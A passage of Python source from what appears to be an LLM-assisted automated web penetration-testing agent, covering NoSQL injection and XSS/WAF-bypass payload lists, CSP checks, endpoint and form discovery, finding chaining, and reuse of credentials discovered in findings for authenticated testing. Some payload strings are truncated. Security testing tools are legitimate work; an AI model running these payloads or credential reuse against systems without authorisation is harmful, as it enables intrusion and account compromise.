await self.log("info", " Testing NoSQL injection...")
nosql_payloads = [
'{"$gt": ""}',
'{"$ne": null}',
'{"$where": "1==1"}',
"[$gt]=&",
'{"username": {"$gt": ""}, "password": {"$gt": ""}}',
]
for param, endpoints in list(self.recon.parameters.items())[:5]:
for endpoint in endpoints[:2]:
url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
if not url:
continue
for payload in nosql_payloads:
try:
test_url = f"{url.split('?')[0]}?{param}={payload}"
async with self.session.get(test_url) as resp:
body = await resp.text()
if resp.status == 200 and len(body) > 100:
await self.log("debug", f" NoSQL payload accepted: {param}={payload[:30]}")
except:
pass
async def _test_waf_bypass_fallback(self):
"""Test for WAF bypass without LLM"""
await self.log("info", " Testing WAF bypass techniques...")
bypass_payloads = [
"", # Original
"ipt>alert(1)", # Nested
"
", # Event handler
"</script>", # Double encoding
"%3Cscript%3Ealert(1)%3C/script%3E", # URL encoded
]
for endpoint in [self.target]:
for payload in bypass_payloads:
try:
test_url = f"{endpoint}?test={payload}"
async with self.session.get(test_url) as resp:
if resp.status == 403:
await self.log("debug", f" WAF blocked: {payload[:30]}")
elif resp.status == 200:
body = await resp.text()
if payload in body or "alert(1)" in body:
await self.log("warning", f" [POTENTIAL] WAF bypass: {payload[:30]}")
except:
pass
async def _test_csp_bypass_fallback(self):
"""Test for CSP bypass without LLM"""
await self.log("info", " Testing CSP bypass...")
try:
async with self.session.get(self.target) as resp:
csp = resp.headers.get("Content-Security-Policy", "")
if not csp:
await self.log("warning", " No CSP header found")
return
# Check for weak CSP
weaknesses = []
if "unsafe-inline" in csp:
weaknesses.append("unsafe-inline allows inline scripts")
if "unsafe-eval" in csp:
weaknesses.append("unsafe-eval allows eval()")
if "*" in csp:
weaknesses.append("Wildcard (*) in CSP is too permissive")
if "data:" in csp:
weaknesses.append("data: URI scheme can be abused")
if weaknesses:
finding = Finding(
id=hashlib.md5(f"csp{self.target}".encode()).hexdigest()[:8],
title="Weak Content Security Policy",
severity="medium",
vulnerability_type="csp_bypass",
cvss_score=4.0,
cwe_id="CWE-693",
description=f"CSP has weaknesses: {'; '.join(weaknesses)}",
affected_endpoint=self.target,
evidence=f"CSP: {csp[:500]}",
remediation="Remove unsafe-inline, unsafe-eval, wildcards, and data: from CSP.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] Weak CSP: {', '.join(weaknesses)}")
except:
pass
async def _ai_test_vulnerability(self, vuln_type: str):
"""Wrapper for backwards compatibility - now uses AI dynamic test"""
await self._ai_dynamic_test(vuln_type)
async def _execute_ai_test(self, test: Dict, vuln_type: str):
"""Execute an AI-generated test"""
if not self.session:
return
try:
url = test.get("url", self.target)
method = test.get("method", "GET").upper()
headers = test.get("headers", {})
params = test.get("params", {})
check = test.get("check", "")
if method == "GET":
async with self.session.get(url, params=params, headers=headers) as resp:
body = await resp.text()
response_headers = dict(resp.headers)
else:
async with self.session.post(url, data=params, headers=headers) as resp:
body = await resp.text()
response_headers = dict(resp.headers)
# Use AI to analyze if vulnerability exists
if self.llm.is_available() and check:
analysis_prompt = f"""Analyze this response for {vuln_type} vulnerability.
Check for: {check}
Response status: {resp.status}
Response headers: {dict(list(response_headers.items())[:10])}
Response body (first 1000 chars): {body[:1000]}
Is this vulnerable? Respond with:
VULNERABLE:
or
NOT_VULNERABLE: """
result = await self.llm.generate(analysis_prompt, get_system_prompt("verification"))
if "VULNERABLE:" in result.upper():
evidence = result.split(":", 1)[1].strip() if ":" in result else result
# Anti-hallucination: verify AI evidence in actual response
if not self._evidence_in_response(evidence, body):
await self.log("debug", f" [REJECTED] AI evidence not grounded in response for {vuln_type}")
return
mapped = self._map_vuln_type(vuln_type)
finding = Finding(
id=hashlib.md5(f"{vuln_type}{url}ai".encode()).hexdigest()[:8],
title=self.vuln_registry.get_title(mapped) or f"AI-Detected {vuln_type.title()} Vulnerability",
severity=self._get_severity(vuln_type),
vulnerability_type=vuln_type,
cvss_score=self._get_cvss_score(vuln_type),
cvss_vector=self._get_cvss_vector(vuln_type),
cwe_id=self.vuln_registry.get_cwe_id(mapped) or "",
description=self.vuln_registry.get_description(mapped) or f"AI analysis detected potential {vuln_type} vulnerability.",
affected_endpoint=url,
evidence=evidence[:500],
remediation=self.vuln_registry.get_remediation(mapped) or f"Review and remediate the {vuln_type} vulnerability.",
ai_verified=True
)
await self._add_finding(finding)
await self.log("warning", f" [AI FOUND] {vuln_type} at {url[:50]}")
except Exception as e:
await self.log("debug", f" AI test execution error: {e}")
async def _test_single_param(self, base_url: str, param: str, payload: str, vuln_type: str):
"""Test a single parameter with a payload"""
if not self.session:
return
try:
# Build test URL
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
test_url = f"{base}?{param}={payload}"
async with self.session.get(test_url) as resp:
body = await resp.text()
response_data = {
"status": resp.status,
"body": body,
"headers": dict(resp.headers),
"url": str(resp.url),
"method": "GET",
"content_type": resp.headers.get("Content-Type", "")
}
is_vuln, evidence = await self._verify_vulnerability(vuln_type, payload, response_data)
if is_vuln:
await self.log("warning", f" [POTENTIAL] {vuln_type.upper()} found in {param}")
# Run through ValidationJudge pipeline
finding = await self._judge_finding(
vuln_type, test_url, param, payload, evidence, response_data
)
if finding:
await self._add_finding(finding)
except Exception as e:
await self.log("debug", f" Test error: {e}")
async def log_script(self, level: str, message: str):
"""Log a script/tool message"""
await self.log(level, message)
async def log_llm(self, level: str, message: str):
"""Log an LLM/AI message - prefixed with [AI] or [LLM]"""
if not message.startswith('[AI]') and not message.startswith('[LLM]'):
message = f"[AI] {message}"
await self.log(level, message)
async def _add_finding(self, finding: Finding):
"""Add a finding through memory (dedup + bounded + evidence check)"""
added = self.memory.add_finding(finding)
if not added:
reason = "duplicate" if self.memory.has_finding_for(
finding.vulnerability_type, finding.affected_endpoint, finding.parameter
) else "rejected by memory (missing evidence, speculative, or at capacity)"
await self.log("info", f" [SKIP] {finding.title} - {reason}")
return
await self.log("warning", f" [FOUND] {finding.title} - {finding.severity}")
# AI exploitation validation
try:
validation = await self._ai_validate_exploitation(asdict(finding))
if validation:
if validation.get("false_positive_risk") in ("medium", "high"):
await self.log("warning", f" [AI] False positive risk: {validation['false_positive_risk']} for {finding.title}")
if validation.get("exploitation_notes"):
finding.evidence = f"{finding.evidence or ''} | [AI Validation] {validation['exploitation_notes']}"
await self.log("info", f" [AI] Exploitation notes: {validation['exploitation_notes'][:100]}")
except Exception:
pass
# Generate PoC code for the confirmed finding
if not finding.poc_code:
try:
finding.poc_code = self.poc_generator.generate(
finding.vulnerability_type,
finding.affected_endpoint,
finding.parameter,
finding.payload,
finding.evidence,
method=finding.request.split()[0] if finding.request else "GET"
)
except Exception:
pass
# Record success in execution history for cross-scan learning
if self.execution_history:
try:
self.execution_history.record(
self.recon.technologies,
finding.vulnerability_type,
finding.affected_endpoint,
True,
finding.evidence or ""
)
except Exception:
pass
# Capture screenshot for the confirmed finding
await self._capture_finding_screenshot(finding)
# Chain engine: derive new targets from this finding
if self.chain_engine:
try:
derived = await self.chain_engine.on_finding(finding, self.recon, self.memory)
if derived:
await self.log("info", f" [CHAIN] {len(derived)} derived targets from {finding.vulnerability_type}")
for chain_target in derived[:5]: # Limit to 5 derived targets per finding
await self.log("info", f" [CHAIN] Testing {chain_target.vuln_type} → {chain_target.url[:50]}")
try:
chain_finding = await self._test_vulnerability_type(
chain_target.url,
chain_target.vuln_type,
"GET",
[chain_target.param] if chain_target.param else ["id"]
)
if chain_finding:
chain_finding.evidence = f"{chain_finding.evidence or ''} [CHAIN from {finding.id}: {finding.vulnerability_type}]"
await self._add_finding(chain_finding)
except Exception as e:
await self.log("debug", f" [CHAIN] Test failed: {e}")
except Exception as e:
await self.log("debug", f" [CHAIN] Engine error: {e}")
# Feed discovered credentials to auth manager
if self.auth_manager and finding.vulnerability_type in (
"information_disclosure", "api_key_exposure", "default_credentials",
"weak_password", "hardcoded_secrets"
):
try:
cred_pattern = re.findall(
r'(?:password|passwd|pwd|pass|api_key|apikey|token|secret)[=:"\s]+([^\s"\'&,;]{4,})',
finding.evidence or "", re.IGNORECASE
)
for cred_val in cred_pattern[:3]:
self.auth_manager.add_credentials(
username="discovered", password=cred_val,
role="user", source="discovered"
)
await self.log("info", f" [AUTH] Discovered credential fed to auth manager")
except Exception:
pass
if self.finding_callback:
try:
await self.finding_callback(asdict(finding))
except Exception as e:
print(f"Finding callback error: {e}")
async def _capture_finding_screenshot(self, finding: Finding):
"""Capture a browser screenshot for a confirmed vulnerability finding.
Uses Playwright via BrowserValidator to navigate to the affected
endpoint and take a full-page screenshot. Screenshots are stored in
reports/screenshots/{scan_id}/{finding_id}/ when scan_id is available,
or reports/screenshots/{finding_id}/ as fallback. Screenshots are also
embedded as base64 in the finding's screenshots list for HTML reports.
"""
if not HAS_PLAYWRIGHT or BrowserValidator is None:
return
url = finding.affected_endpoint
if not url or not url.startswith(("http://", "https://")):
return
try:
# Organize screenshots by scan_id subfolder
if self.scan_id:
screenshots_dir = f"reports/screenshots/{self.scan_id}"
else:
screenshots_dir = "reports/screenshots"
validator = BrowserValidator(screenshots_dir=screenshots_dir)
await validator.start(headless=True)
try:
result = await validator.validate_finding(
finding_id=finding.id,
url=url,
payload=finding.payload,
timeout=15000
)
# Embed screenshots as base64 data URIs
for ss_path in result.get("screenshots", []):
data_uri = embed_screenshot(ss_path)
if data_uri:
finding.screenshots.append(data_uri)
if finding.screenshots:
await self.log("info", f" [SCREENSHOT] Captured {len(finding.screenshots)} screenshot(s) for {finding.id}")
finally:
await validator.stop()
except Exception as e:
await self.log("debug", f" Screenshot capture failed for {finding.id}: {e}")
def _normalize_target(self, target: str) -> str:
"""Ensure target has proper scheme"""
if not target.startswith(('http://', 'https://')):
return f"https://{target}"
return target
async def _default_log(self, level: str, message: str):
timestamp = datetime.utcnow().strftime("%H:%M:%S")
print(f"[{timestamp}] [{level.upper()}] {message}")
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=30)
timeout = aiohttp.ClientTimeout(total=30, connect=10)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
}
headers.update(self.auth_headers)
self.session = aiohttp.ClientSession(
connector=connector,
timeout=timeout,
headers=headers,
cookie_jar=aiohttp.CookieJar(unsafe=True)
)
# Initialize autonomy modules that depend on session
self.request_engine = RequestEngine(
self.session, default_delay=0.1, max_retries=3,
is_cancelled_fn=self.is_cancelled
)
self.waf_detector = WAFDetector(self.request_engine)
self.strategy = StrategyAdapter(self.memory)
self.auth_manager = AuthManager(self.request_engine, self.recon)
return self
async def __aexit__(self, *args):
# Cleanup per-scan sandbox container
if self.scan_id and self._sandbox:
try:
from core.container_pool import get_pool
await get_pool().destroy(self.scan_id)
self._sandbox = None
except Exception:
pass
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""Main execution method"""
await self.log("info", "=" * 60)
await self.log("info", " NEUROSPLOIT AI SECURITY AGENT")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", f"Mode: {self.mode.value}")
if self.llm.is_available():
await self.log("success", f"LLM Provider: {self.llm.provider.upper()} (Connected)")
else:
await self.log("error", "=" * 60)
await self.log("error", " WARNING: LLM NOT CONFIGURED!")
await self.log("error", "=" * 60)
await self.log("warning", "Set ANTHROPIC_API_KEY in .env file")
await self.log("warning", "Running with basic detection only (no AI enhancement)")
if self.llm.error_message:
await self.log("warning", f"Reason: {self.llm.error_message}")
await self.log("info", "")
try:
if self.mode == OperationMode.RECON_ONLY:
return await self._run_recon_only()
elif self.mode == OperationMode.FULL_AUTO:
return await self._run_full_auto()
elif self.mode == OperationMode.PROMPT_ONLY:
return await self._run_prompt_only()
elif self.mode == OperationMode.ANALYZE_ONLY:
return await self._run_analyze_only()
elif self.mode == OperationMode.AUTO_PENTEST:
return await self._run_auto_pentest()
else:
return await self._run_full_auto()
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return self._generate_error_report(str(e))
async def _update_progress(self, progress: int, phase: str):
if self.progress_callback:
await self.progress_callback(progress, phase)
# ==================== RECONNAISSANCE ====================
async def _run_recon_only(self) -> Dict:
"""Comprehensive reconnaissance"""
await self._update_progress(0, "Starting reconnaissance")
# Phase 1: Initial probe
await self.log("info", "[PHASE 1/4] Initial Probe")
await self._initial_probe()
await self._update_progress(25, "Initial probe complete")
# Phase 2: Endpoint discovery
await self.log("info", "[PHASE 2/4] Endpoint Discovery")
await self._discover_endpoints()
await self._update_progress(50, "Endpoint discovery complete")
# Phase 3: Parameter discovery
await self.log("info", "[PHASE 3/4] Parameter Discovery")
await self._discover_parameters()
await self._update_progress(75, "Parameter discovery complete")
# Phase 4: Technology detection
await self.log("info", "[PHASE 4/4] Technology Detection")
await self._detect_technologies()
await self._update_progress(100, "Reconnaissance complete")
return self._generate_recon_report()
async def _initial_probe(self):
"""Initial probe of the target"""
try:
async with self.session.get(self.target, allow_redirects=True) as resp:
self.recon.live_hosts.append(self.target)
body = await resp.text()
# Extract base information
await self._extract_links(body, self.target)
await self._extract_forms(body, self.target)
await self._extract_js_files(body, self.target)
await self.log("info", f" Target is live: {resp.status}")
except Exception as e:
await self.log("error", f" Target probe failed: {e}")
async def _discover_endpoints(self):
"""Discover endpoints through crawling and common paths"""
# Common paths to check
common_paths = [
"/", "/admin", "/login", "/api", "/api/v1", "/api/v2",
"/user", "/users", "/account", "/profile", "/dashboard",
"/search", "/upload", "/download", "/file", "/files",
"/config", "/settings", "/admin/login", "/wp-admin",
"/robots.txt", "/sitemap.xml", "/.git/config",
"/api/users", "/api/login", "/graphql", "/api/graphql",
"/swagger", "/api-docs", "/docs", "/health", "/status"
]
base = self.target.rstrip('/')
parsed_target = urlparse(self.target)
# Add known vulnerable endpoints for common test sites
if "vulnweb" in parsed_target.netloc or "testphp" in parsed_target.netloc:
await self.log("info", " Detected test site - adding known vulnerable endpoints")
common_paths.extend([
"/listproducts.php?cat=1",
"/artists.php?artist=1",
"/search.php?test=1",
"/guestbook.php",
"/comment.php?aid=1",
"/showimage.php?file=1",
"/product.php?pic=1",
"/hpp/?pp=12",
"/AJAX/index.php",
"/secured/newuser.php",
])
elif "juice-shop" in parsed_target.netloc or "juiceshop" in parsed_target.netloc:
common_paths.extend([
"/rest/products/search?q=test",
"/api/Users",
"/api/Products",
"/rest/user/login",
])
elif "dvwa" in parsed_target.netloc:
common_paths.extend([
"/vulnerabilities/sqli/?id=1&Submit=Submit",
"/vulnerabilities/xss_r/?name=test",
"/vulnerabilities/fi/?page=include.php",
])
tasks = []
for path in common_paths:
tasks.append(self._check_endpoint(f"{base}{path}"))
await asyncio.gather(*tasks, return_exceptions=True)
# Crawl discovered pages for more endpoints
for endpoint in list(self.recon.endpoints)[:10]:
await self._crawl_page(_get_endpoint_url(endpoint))
await self.log("info", f" Found {len(self.recon.endpoints)} endpoints")
async def _check_endpoint(self, url: str):
"""Check if endpoint exists"""
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status not in [404, 403, 500, 502, 503]:
endpoint_data = {
"url": url,
"method": "GET",
"status": resp.status,
"content_type": resp.headers.get("Content-Type", ""),
"path": urlparse(url).path
}
if endpoint_data not in self.recon.endpoints:
self.recon.endpoints.append(endpoint_data)
except:
pass
async def _crawl_page(self, url: str):
"""Crawl a page for more links and forms"""
if not url:
return
try:
async with self.session.get(url) as resp:
body = await resp.text()
await self._extract_links(body, url)
await self._extract_forms(body, url)
except:
pass
async def _extract_links(self, body: str, base_url: str):
"""Extract links from HTML"""
# Find href links
hrefs = re.findall(r'href=["\']([^"\']+)["\']', body, re.I)
# Find src links
srcs = re.findall(r'src=["\']([^"\']+)["\']', body, re.I)
# Find action links
actions = re.findall(r'action=["\']([^"\']+)["\']', body, re.I)
base_parsed = urlparse(base_url)
base_domain = f"{base_parsed.scheme}://{base_parsed.netloc}"
for link in hrefs + actions:
if link.startswith('/'):
full_url = base_domain + link
elif link.startswith('http') and base_parsed.netloc in link:
full_url = link
else:
continue
# Skip external links and assets
if any(ext in link.lower() for ext in ['.css', '.png', '.jpg', '.gif', '.ico', '.svg']):
continue
endpoint_data = {
"url": full_url,
"method": "GET",
"path": urlparse(full_url).path
}
if endpoint_data not in self.recon.endpoints and len(self.recon.endpoints) < 100:
self.recon.endpoints.append(endpoint_data)
async def _extract_forms(self, body: str, base_url: str):
"""Extract forms from HTML including input types and hidden field values"""
# Capture the opening '
forms = re.findall(form_pattern, body, re.I | re.DOTALL)
base_parsed = urlparse(base_url)
for form_attrs, form_html in forms:
# Extract action from the